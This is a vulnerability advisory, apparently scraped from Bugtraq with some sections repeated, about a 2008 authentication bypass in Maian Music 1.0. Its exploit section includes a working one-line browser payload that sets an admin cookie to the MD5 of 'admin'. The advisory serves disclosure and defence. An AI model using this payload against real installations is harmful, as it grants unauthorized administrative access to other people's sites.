Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
BID:30198
Info
Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
| Bugtraq ID: | 30198 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2008 12:00AM |
| Updated: | Jul 14 2008 07:09PM |
| Credit: | Saime |
| Vulnerable: |
Maian Script World Maian Music 1.0 |
| Not Vulnerable: | |
Discussion
Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
Maian Music is prone to an authentication-bypass vulnerability because if fails to adequately authenticate users.
Attackers can exploit this issue to gain administrative access to the application.
Maian Music 1.0 is vulnerable; other versions may also be affected.
Maian Music is prone to an authentication-bypass vulnerability because if fails to adequately authenticate users.
Attackers can exploit this issue to gain administrative access to the application.
Maian Music 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
Attackers can exploit this issue using a browser.
The following example exploit is available:
javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"
NOTE: md5sum admin = 21232f297a57a5a743894a0e4a801fc3
Attackers can exploit this issue using a browser.
The following example exploit is available:
javascript:document.cookie = "mmusic_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/music/admin/"
NOTE: md5sum admin = 21232f297a57a5a743894a0e4a801fc3
Solution / Fix
Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Maian Music 'mmusic_cookie' Authentication Bypass Vulnerability
References:
References:
- Maian Weblog Homepage (Maian Script World)